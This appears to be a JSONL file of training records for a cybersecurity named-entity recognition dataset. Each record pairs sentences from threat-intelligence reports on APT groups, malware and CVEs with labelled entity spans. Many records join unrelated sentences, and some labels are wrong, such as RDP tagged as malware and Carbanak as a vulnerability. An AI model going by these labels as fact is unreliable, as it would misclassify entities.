{"text": "At this point the malware extracts and decrypts a stub DLL from its own resources ( ID 101 ) . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . Features : Do you have cyber security concerns about your business Contact CoreTech today , and we will conduct an IT security assessment .", "spans": {"TOOL: PowerShell command": [[111, 129]], "TOOL: PupyRAT": [[198, 205]], "TOOL: research and penetration-testing tool": [[210, 247]], "ORGANIZATION: CoreTech": [[355, 363]]}, "info": {"id": "cyberner_stix_train_006247", "source": "cyberner_stix_train"}}
{"text": "The attackers have taken down their communication channels and are probably looking for ways to assemble their tools in a different manner . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . The threat group is also known for its recent attack campaign against Bank and Retail business sectors , but the latest evidence indicates a potential expansion of its criminal operation to other industries too .", "spans": {"THREAT_ACTOR: APT group": [[199, 208]]}, "info": {"id": "cyberner_stix_train_006248", "source": "cyberner_stix_train"}}
{"text": "X-Force IRIS Hosting URL : http://mol.com-ho.me/cv_itworx.doc .", "spans": {"URL: http://mol.com-ho.me/cv_itworx.doc": [[27, 61]]}, "info": {"id": "cyberner_stix_train_006249", "source": "cyberner_stix_train"}}
{"text": "This IP address has been used to monitor open-source coverage of TRITON , heightening the probability of an interest by unknown subjects , originating from this network , in TEMP.Veles related activities .", "spans": {"MALWARE: TRITON": [[65, 71]], "THREAT_ACTOR: TEMP.Veles": [[174, 184]]}, "info": {"id": "cyberner_stix_train_006250", "source": "cyberner_stix_train"}}
{"text": "Once opened , HenBox runs the following query to gather message information . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks .", "spans": {"MALWARE: HenBox": [[14, 20]], "TOOL: HOMEUNIX": [[78, 86]], "TOOL: backdoor": [[105, 113]], "THREAT_ACTOR: APT41": [[122, 127]], "THREAT_ACTOR: groups": [[186, 192]], "THREAT_ACTOR: APT1": [[205, 209]], "THREAT_ACTOR: APT10": [[212, 217]], "THREAT_ACTOR: APT17": [[220, 225]], "THREAT_ACTOR: APT18": [[228, 233]], "THREAT_ACTOR: APT20": [[240, 245]], "THREAT_ACTOR: Sofacy group": [[252, 264]], "MALWARE: Komplex Trojan": [[277, 291]]}, "info": {"id": "cyberner_stix_train_006251", "source": "cyberner_stix_train"}}
{"text": "The following network traffic is performed by the Delphi sample which has the following metadata once unpacked by UPX :", "spans": {"TOOL: Delphi": [[50, 56]], "TOOL: UPX": [[114, 117]]}, "info": {"id": "cyberner_stix_train_006252", "source": "cyberner_stix_train"}}
{"text": "Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"MALWARE: Ordnance": [[0, 8]], "MALWARE: shellcode": [[101, 110]], "MALWARE: GozNym": [[164, 170]], "MALWARE: Trojan": [[216, 222]], "ORGANIZATION: banking customers": [[296, 313]]}, "info": {"id": "cyberner_stix_train_006253", "source": "cyberner_stix_train"}}
{"text": "Here , the RAT stores all the captured videos in a “ video.3gp ” file . The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . This group has become one of the most active threat actors , with noteworthy abilities , resources and infrastructure ; speculations indicate the hacking organization to be sponsored by the Iranian government . The code hunted for several security products to evade – including Kaspersky .", "spans": {"TOOL: LOWBALL": [[76, 83]], "THREAT_ACTOR: group": [[115, 120]], "TOOL: BUBBLEWRAP": [[178, 188]], "ORGANIZATION: Iranian government": [[476, 494]], "TOOL: Kaspersky": [[564, 573]]}, "info": {"id": "cyberner_stix_train_006254", "source": "cyberner_stix_train"}}
{"text": "The CrowdStrike Falcon Intelligence team , which had been tracking Levashov as the adversary called ZOMBIE SPIDER , was able to help law enforcement seize control of the Kelihos botnet so that it could no longer be used by criminal actors . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": {"ORGANIZATION: CrowdStrike Falcon Intelligence": [[4, 35]], "THREAT_ACTOR: ZOMBIE SPIDER": [[100, 113]], "MALWARE: Remote Desktop Protocol": [[298, 321]], "MALWARE: RDP": [[324, 327]], "MALWARE: Carbanak": [[332, 340]]}, "info": {"id": "cyberner_stix_train_006255", "source": "cyberner_stix_train"}}
{"text": "However the Server handlers and command function are not , so we cannot create a completely perfect simulation .", "spans": {}, "info": {"id": "cyberner_stix_train_006256", "source": "cyberner_stix_train"}}
{"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . Cadelle 's threats are capable of opening a back door and stealing information from victims' computers .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "MALWARE: MS Word document": [[132, 148]]}, "info": {"id": "cyberner_stix_train_006258", "source": "cyberner_stix_train"}}
{"text": "During one intrusion , it connected to multiple C2 domains on TCP port 80 , including mail . svrchost . com , using the following request .", "spans": {"TOOL: C2": [[48, 50]]}, "info": {"id": "cyberner_stix_train_006259", "source": "cyberner_stix_train"}}
{"text": "Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": {"TOOL: Bookworm": [[0, 8]]}, "info": {"id": "cyberner_stix_train_006260", "source": "cyberner_stix_train"}}
{"text": "Currently , all bespoke apps have been taken down from the Google Play store . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 . These groups use a lot of social engineering in their attacks , asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people . The U.S. Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that “ advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data ” after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": {"SYSTEM: Google Play": [[59, 70]], "ORGANIZATION: primarily companies": [[94, 113]], "ORGANIZATION: U.S. Cybersecurity and Infrastructure Security Agency ( CISA )": [[456, 518]], "ORGANIZATION: Microsoft": [[601, 610]], "THREAT_ACTOR: advanced persistent threat ( APT ) actors": [[627, 668]], "SYSTEM: Microsoft 365 cloud environment": [[790, 821]]}, "info": {"id": "cyberner_stix_train_006261", "source": "cyberner_stix_train"}}
{"text": "a command from the C & C server . This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government . However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE , which we believe may have dropped the . The hijacking is achieved by adding the threat actor 's e - mail address to the Facebook Business account with Admin and Finance editor roles .", "spans": {"TOOL: name servers": [[173, 185]], "THREAT_ACTOR: APT33": [[215, 220]], "TOOL: AutoIt": [[430, 436]], "TOOL: PE": [[456, 458]]}, "info": {"id": "cyberner_stix_train_006262", "source": "cyberner_stix_train"}}
{"text": "THREAT ANALYSIS Infection Vector : Smishing Your Device Thus far , FakeSpy campaigns are characterized by SMS phishing ( a.k.a . Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups .", "spans": {"MALWARE: FakeSpy": [[67, 74]], "THREAT_ACTOR: APT33": [[153, 158]], "ORGANIZATION: Kaspersky Lab": [[390, 403]], "THREAT_ACTOR: groups": [[511, 517]]}, "info": {"id": "cyberner_stix_train_006263", "source": "cyberner_stix_train"}}
{"text": "Upon adding a network drive , the hook calls its “ RecordToFile ” file stealer method .", "spans": {}, "info": {"id": "cyberner_stix_train_006264", "source": "cyberner_stix_train"}}
{"text": "To communicate with the C2 server , the Trojan will send emails to specific email addresses via SMTPS over TCP port 587 .", "spans": {"TOOL: C2": [[24, 26]], "MALWARE: Trojan": [[40, 46]], "TOOL: emails": [[57, 63]], "TOOL: email": [[76, 81]]}, "info": {"id": "cyberner_stix_train_006265", "source": "cyberner_stix_train"}}
{"text": "Split of exfiltrated data Some noteworthy files identified in content taken from compromised devices include passport photos , audio recordings of calls , other images , and a PDF document with data on 484 individuals . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . Although they control systems in dozens of countries , their attacks originate from four large networks in Shanghai — two of which are allocated directly to the Pudong New Area , the home of Unit 61398 . Recently , this model for threat actors has come to be known as the “ as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": {"TOOL: Trojan.Naid": [[326, 337]], "MALWARE: Backdoor.Moudoor": [[340, 356]], "TOOL: Backdoor.Hikit": [[363, 377]], "ORGANIZATION: Unit 61398": [[571, 581]], "THREAT_ACTOR: threat actors": [[610, 623]]}, "info": {"id": "cyberner_stix_train_006266", "source": "cyberner_stix_train"}}
{"text": "According to a now-defunct social media profile , the same individual was a professor at CNIIHM , which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow .", "spans": {"ORGANIZATION: CNIIHM": [[89, 95]]}, "info": {"id": "cyberner_stix_train_006267", "source": "cyberner_stix_train"}}
{"text": "A Mac version of the Trojan also exists ( OSX.Sofacy ) .", "spans": {"SYSTEM: Mac": [[2, 5]], "MALWARE: Trojan": [[21, 27]], "FILEPATH: OSX.Sofacy": [[42, 52]]}, "info": {"id": "cyberner_stix_train_006268", "source": "cyberner_stix_train"}}
{"text": "We are aware of one case where Scarlet Mimic broke from the spear-phishing pattern described above . 360 and Tuisec already identified some Gorgon Group members .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[31, 44]], "ORGANIZATION: 360": [[101, 104]], "ORGANIZATION: Tuisec": [[109, 115]], "THREAT_ACTOR: Gorgon Group": [[140, 152]], "ORGANIZATION: members": [[153, 160]]}, "info": {"id": "cyberner_stix_train_006269", "source": "cyberner_stix_train"}}
{"text": "This leads us to believe this is another actor . In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . A handle to the DLL file is taken in order to make its deletion more difficult . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the • None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": {"ORGANIZATION: Novetta": [[58, 65]], "TOOL: Winnti malware": [[103, 117]], "TOOL: DLL": [[177, 180]], "ORGANIZATION: CrowdStrike": [[281, 292]]}, "info": {"id": "cyberner_stix_train_006270", "source": "cyberner_stix_train"}}
{"text": "System application installed by mcpef.apk . To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province .", "spans": {"VULNERABILITY: Rocke group exploits vulnerabilities": [[96, 132]], "THREAT_ACTOR: Moafee group": [[204, 216]], "THREAT_ACTOR: DragonOK": [[231, 239]], "MALWARE: HTRAN": [[248, 253]], "TOOL: C2": [[269, 271]]}, "info": {"id": "cyberner_stix_train_006271", "source": "cyberner_stix_train"}}
{"text": "Sample 1 marks the first HenBox sample we saw embedding a legitimate app within its assets to be dropped and installed on the victim device as a decoy . From the time of file creation , the attacker started working at least as early as July 2018 . FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines .", "spans": {"MALWARE: HenBox": [[25, 31]], "THREAT_ACTOR: attacker": [[190, 198]], "ORGANIZATION: FireEye": [[248, 255]], "THREAT_ACTOR: APT17": [[270, 275]], "MALWARE: BLACKCOFFEE": [[286, 297]]}, "info": {"id": "cyberner_stix_train_006273", "source": "cyberner_stix_train"}}
{"text": "Indeed , the Trojan explicitly targets Russian-speaking users . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . The actor has conducted operations since at least 2013 in support of China 's naval modernization effort .", "spans": {"MALWARE: CONFUCIUS_A": [[93, 104]], "TOOL: SNEEPY": [[223, 229]], "TOOL: ByeByeShell": [[236, 247]], "ORGANIZATION: Rapid7": [[268, 274]], "THREAT_ACTOR: actor": [[289, 294]]}, "info": {"id": "cyberner_stix_train_006274", "source": "cyberner_stix_train"}}
{"text": "Unlike previous campaigns from this actor , the flyer does not contain an Office exploit or a 0-day , it simply contains a malicious Visual Basic for Applications ( VBA ) macro .", "spans": {"TOOL: Visual Basic for Applications": [[133, 162]], "TOOL: VBA": [[165, 168]]}, "info": {"id": "cyberner_stix_train_006275", "source": "cyberner_stix_train"}}
{"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[128, 147]], "ORGANIZATION: defense": [[160, 167]], "ORGANIZATION: biotechnology": [[190, 203]], "ORGANIZATION: electronics manufacturing": [[206, 231]], "ORGANIZATION: industrial chemistry": [[238, 258]], "TOOL: e-mail": [[265, 271]], "TOOL: Microsoft PowerPoint": [[282, 302]], "FILEPATH: thanks.pps": [[316, 326]], "TOOL: VirusTotal": [[331, 341]], "TOOL: Microsoft Word": [[358, 372]], "FILEPATH: request.docx": [[390, 402]]}, "info": {"id": "cyberner_stix_train_006276", "source": "cyberner_stix_train"}}
{"text": "Backdoor.Zekapab is installed on selected infected computers and is capable of taking screenshots , executing files and commands , uploading and downloading files , performing registry and file system operations , and carrying out system information tasks .", "spans": {"FILEPATH: Backdoor.Zekapab": [[0, 16]]}, "info": {"id": "cyberner_stix_train_006277", "source": "cyberner_stix_train"}}
{"text": "The malware uses HTTP for communication with the C2 server for command handling and data exfiltration . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {"MALWARE: DriverInstallerU.exe": [[134, 154]], "MALWARE: Interenet Assistant.exe": [[204, 227]], "THREAT_ACTOR: ScarCruft": [[234, 243]]}, "info": {"id": "cyberner_stix_train_006278", "source": "cyberner_stix_train"}}
{"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 .", "spans": {"VULNERABILITY: Carbanak": [[10, 18]], "ORGANIZATION: banks": [[55, 60]], "ORGANIZATION: electronic payment": [[65, 83]], "ORGANIZATION: space": [[125, 130]], "THREAT_ACTOR: Turla": [[186, 191]]}, "info": {"id": "cyberner_stix_train_006279", "source": "cyberner_stix_train"}}
{"text": "Code snippets showing how GolfSpy monitors phone calls via register receiver ( top left ) , its actions when the device is woken up ( top right ) , and how it encrypts the stolen data ( bottom ) The malware retrieves commands from the C & C server via HTTP , and attackers can steal specific files on the infected device . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes . The script executes an open-source .NET class used for taking a screenshot . When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": {"MALWARE: GolfSpy": [[26, 33]], "THREAT_ACTOR: ScarCruft": [[334, 343]], "ORGANIZATION: intelligence": [[367, 379]], "ORGANIZATION: political": [[384, 393]], "ORGANIZATION: diplomatic": [[398, 408]], "FILEPATH: .NET": [[455, 459]], "THREAT_ACTOR: attacker": [[505, 513]], "MALWARE: as - a - service malware": [[526, 550]]}, "info": {"id": "cyberner_stix_train_006280", "source": "cyberner_stix_train"}}
{"text": "A charge is then added to the user ’ s bill with their mobile service provider . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope . SysInfo Get target System information . We were able to find additional links between Hack520 ’s “ Pig network ” and the Winnti group ’s activities .", "spans": {"THREAT_ACTOR: Advanced Persistent": [[133, 152]], "THREAT_ACTOR: Threat ( APT ) 40": [[153, 170]], "THREAT_ACTOR: Periscope": [[185, 194]], "THREAT_ACTOR: Winnti group": [[318, 330]]}, "info": {"id": "cyberner_stix_train_006281", "source": "cyberner_stix_train"}}
{"text": "Interestingly , the embedded app in sample 2 is not a version of the Android Settings app but instead the “ Amaq Agency ” app , which reports on ISIS related news . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"SYSTEM: Android Settings": [[69, 85]], "SYSTEM: Amaq Agency": [[108, 119]], "THREAT_ACTOR: APT41": [[165, 170]], "THREAT_ACTOR: APT19": [[343, 348]], "ORGANIZATION: defense sector firms": [[374, 394]], "ORGANIZATION: political": [[426, 435]], "ORGANIZATION: financial": [[438, 447]], "ORGANIZATION: pharmaceutical": [[450, 464]], "ORGANIZATION: energy sectors": [[469, 483]]}, "info": {"id": "cyberner_stix_train_006282", "source": "cyberner_stix_train"}}
{"text": "Succeeding monitoring efforts revealed a newer variant that exploits the social media platforms Instagram and Tumblr instead of Twitter to hide its C & C address . FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines . Glimpse can be set to use ping mode in several ways while performing receive operations . An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to “ all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . ”", "spans": {"ORGANIZATION: Instagram": [[96, 105]], "ORGANIZATION: Tumblr": [[110, 116]], "ORGANIZATION: Twitter": [[128, 135]], "ORGANIZATION: FireEye": [[164, 171]], "THREAT_ACTOR: APT17": [[186, 191]], "TOOL: BLACKCOFFEE": [[202, 213]], "MALWARE: Glimpse": [[365, 372]]}, "info": {"id": "cyberner_stix_train_006283", "source": "cyberner_stix_train"}}
{"text": "C & C communications The default C & C address is hardwired in the Rotexy code : The relative address to which the Trojan will send information from the device is generated in a pseudo-random manner . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group .", "spans": {"MALWARE: Rotexy": [[67, 73]], "MALWARE: Microsoft Word document": [[261, 284]], "ORGANIZATION: Microsoft": [[414, 423]], "ORGANIZATION: Facebook": [[448, 456]], "ORGANIZATION: security community": [[475, 493]], "THREAT_ACTOR: ZINC": [[631, 635]], "THREAT_ACTOR: Lazarus Group": [[656, 669]]}, "info": {"id": "cyberner_stix_train_006284", "source": "cyberner_stix_train"}}
{"text": "If Adobe Flash or Microsoft Silverlight is no longer required , DHS recommends that those applications be removed from systems .", "spans": {"ORGANIZATION: Adobe": [[3, 8]], "TOOL: Flash": [[9, 14]], "ORGANIZATION: Microsoft": [[18, 27]], "TOOL: Silverlight": [[28, 39]], "ORGANIZATION: DHS": [[64, 67]]}, "info": {"id": "cyberner_stix_train_006285", "source": "cyberner_stix_train"}}
{"text": "Verify Apps : Ensure Verify Apps is enabled . Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe . The actual malicious payload is quite small and only contains about 17 KB of code and data . Mandiant identified a second sample on VirusTotal with the same self - signed certificate CN .", "spans": {"THREAT_ACTOR: actor": [[80, 85]], "ORGANIZATION: maritime industries": [[116, 135]], "ORGANIZATION: naval defense contractors": [[138, 163]], "ORGANIZATION: research institutions": [[181, 202]], "TOOL: VirusTotal": [[377, 387]]}, "info": {"id": "cyberner_stix_train_006286", "source": "cyberner_stix_train"}}
{"text": "When this request completes , the event listener will call the ‘ onload3 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_train_006287", "source": "cyberner_stix_train"}}
{"text": "XLoader as Spyware and Banking Trojan XLoader can also collect information related to usage of apps installed in the device . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . Analyzing it in depth , we discover it actually is the RMS ( Remote Manipulator System ) client by TektonIT , encrypted using the MPress PE compressor utility , a legitimate tool , to avoid antivirus detection .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: SPLM": [[126, 130]], "THREAT_ACTOR: GAMEFISH": [[133, 141]], "THREAT_ACTOR: Zebrocy": [[148, 155]], "TOOL: RMS": [[285, 288]], "TOOL: Remote Manipulator System": [[291, 316]], "TOOL: TektonIT": [[329, 337]], "TOOL: MPress PE": [[360, 369]]}, "info": {"id": "cyberner_stix_train_006288", "source": "cyberner_stix_train"}}
{"text": "It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out . Few security companies have publicly discussed this tactic . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? Divine Comedy .", "spans": {"MALWARE: ItaDuke": [[321, 328]], "MALWARE: Duqu": [[355, 359]], "ORGANIZATION: Dante Alighieri": [[433, 448]], "ORGANIZATION: Divine Comedy": [[455, 468]]}, "info": {"id": "cyberner_stix_train_006289", "source": "cyberner_stix_train"}}
{"text": "It specifically targets financial banking applications across the United States and Europe , including Italy , the UK , Spain , Switzerland , France , and Germany . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer . APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises .", "spans": {"MALWARE: documents": [[237, 246]], "THREAT_ACTOR: APT40": [[405, 410]]}, "info": {"id": "cyberner_stix_train_006290", "source": "cyberner_stix_train"}}
{"text": "Until now , Android malware that wanted advanced capabilities typically had to trick users into approving sometimes scary-sounding permissions or exploit rooting vulnerabilities . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . These include : This article provides an overview of the Iranian cyber threat landscape , including the history of Iranian cyber strategy , the most recent news regarding its attack campaigns , and descriptions of major Iranian cyber threat groups .", "spans": {"SYSTEM: Android": [[12, 19]], "ORGANIZATION: Iranian": [[388, 395], [446, 453]], "THREAT_ACTOR: Iranian cyber threat groups": [[551, 578]]}, "info": {"id": "cyberner_stix_train_006291", "source": "cyberner_stix_train"}}
{"text": "The sample ’ s first appearance seems to be May 15 , 2018 , when it was uploaded to VirusTotal , but it ’ s unclear how the tainted sample is disseminated . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 .", "spans": {"ORGANIZATION: VirusTotal": [[84, 94]], "THREAT_ACTOR: groups": [[201, 207]], "THREAT_ACTOR: FIN7": [[314, 318]]}, "info": {"id": "cyberner_stix_train_006292", "source": "cyberner_stix_train"}}
{"text": "If opened , the dropper runs a loader known as Trojan.Vcrodat on the computer . FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 .", "spans": {"TOOL: dropper": [[16, 23]], "TOOL: Trojan.Vcrodat": [[47, 61]], "ORGANIZATION: FireEye": [[80, 87]], "VULNERABILITY: CVE-2017-10271": [[159, 173]]}, "info": {"id": "cyberner_stix_train_006293", "source": "cyberner_stix_train"}}
{"text": "The only good way to fight all these threats is to be proactive , and so a good security solution is a must . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": {"ORGANIZATION: Anomali": [[110, 117]], "MALWARE: ITW": [[196, 199]], "VULNERABILITY: CVE-2018-0798": [[227, 240]], "THREAT_ACTOR: OilRig group": [[247, 259]], "THREAT_ACTOR: APT34": [[266, 271]], "THREAT_ACTOR: Helix Kitten": [[274, 286]]}, "info": {"id": "cyberner_stix_train_006294", "source": "cyberner_stix_train"}}
{"text": "This action changes the original file size of the DEX file , which makes the malicious resources a part of the DEX file , a section that is ignored by the signature validation process . At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit . Along with the password , the malware ’s authors also include a clean version of unzIP . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"ORGANIZATION: financial establishments": [[277, 301]], "TOOL: unzIP": [[428, 433]], "ORGANIZATION: @SecurityAura": [[472, 485]]}, "info": {"id": "cyberner_stix_train_006295", "source": "cyberner_stix_train"}}
{"text": "The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "MALWARE: MiniDuke": [[88, 96]], "MALWARE: CosmicDuke": [[99, 109]], "MALWARE: OnionDuke": [[112, 121]], "MALWARE: CozyDuke": [[124, 132]], "MALWARE: CloudDuke": [[135, 144]], "MALWARE: SeaDuke": [[147, 154]], "MALWARE: HammerDuke": [[157, 167]], "MALWARE: PinchDuke": [[170, 179]], "MALWARE: GeminiDuke": [[186, 196]]}, "info": {"id": "cyberner_stix_train_006296", "source": "cyberner_stix_train"}}
{"text": "AndroidOS_ProjectSpy.HRX 3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ . APT38 has paralleled North Korea 's worsening financial condition . An entropy threshold adjustment due to check in high maturity level . Knowing what motivates hackers is a key part of keeping them out of your business", "spans": {"THREAT_ACTOR: APT38": [[124, 129]]}, "info": {"id": "cyberner_stix_train_006297", "source": "cyberner_stix_train"}}
{"text": "It was one of the few ransomware strains that were being mass-distributed via email spam and exploit kits , but also as part of targeted attacks against high-profile organizations ( a tactic known as big-game hunting ) at the same time . The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status .", "spans": {"ORGANIZATION: high-profile organizations": [[153, 179]], "THREAT_ACTOR: Sima": [[242, 246]], "ORGANIZATION: Citizenship": [[286, 297]], "ORGANIZATION: Immigration Services": [[302, 322]], "ORGANIZATION: Department of Homeland Security": [[330, 361]]}, "info": {"id": "cyberner_stix_train_006298", "source": "cyberner_stix_train"}}
{"text": "One of the packages after initial launch The iOS variant is not as sophisticated as the Android version , and contained a subset of the functionality the Android releases offered . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques .", "spans": {"SYSTEM: iOS": [[45, 48]], "SYSTEM: Android": [[88, 95], [154, 161]], "VULNERABILITY: CVE-2017-8759": [[207, 220]], "THREAT_ACTOR: MuddyWaters group": [[300, 317]]}, "info": {"id": "cyberner_stix_train_006299", "source": "cyberner_stix_train"}}
{"text": "Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: MuddyWater’s": [[26, 38]], "MALWARE: POWERSTATS v3": [[97, 110]], "FILEPATH: Documents": [[113, 122]], "TOOL: flash": [[132, 137]], "VULNERABILITY: exploit": [[138, 145], [207, 214]], "TOOL: VirusTotal": [[218, 228]]}, "info": {"id": "cyberner_stix_train_006300", "source": "cyberner_stix_train"}}
{"text": "android.intent.action.restart A legacy intent used to indicate a system restart . Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations .", "spans": {"THREAT_ACTOR: APT41": [[104, 109]], "ORGANIZATION: online multiplayer networks": [[210, 237]], "ORGANIZATION: administrators": [[284, 298]], "THREAT_ACTOR: APT28": [[355, 360]]}, "info": {"id": "cyberner_stix_train_006301", "source": "cyberner_stix_train"}}
{"text": "LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The Winnti umbrella continues to operate highly successfully in 2018 .", "spans": {"VULNERABILITY: Microsoft Office vulnerability": [[48, 78]], "VULNERABILITY: CVE-2017-11882": [[81, 95]], "MALWARE: Winnti": [[104, 110]]}, "info": {"id": "cyberner_stix_train_006302", "source": "cyberner_stix_train"}}
{"text": "We can also replace “ shfolder.dll ” ( and add a DLL export proxy to avoid a crash ) , which is loaded whenever the attacker clicks the builder tab – allowing us to infect the server while it runs , without the need to wait for application restart .", "spans": {"FILEPATH: shfolder.dll": [[22, 34]], "TOOL: DLL": [[49, 52]]}, "info": {"id": "cyberner_stix_train_006303", "source": "cyberner_stix_train"}}
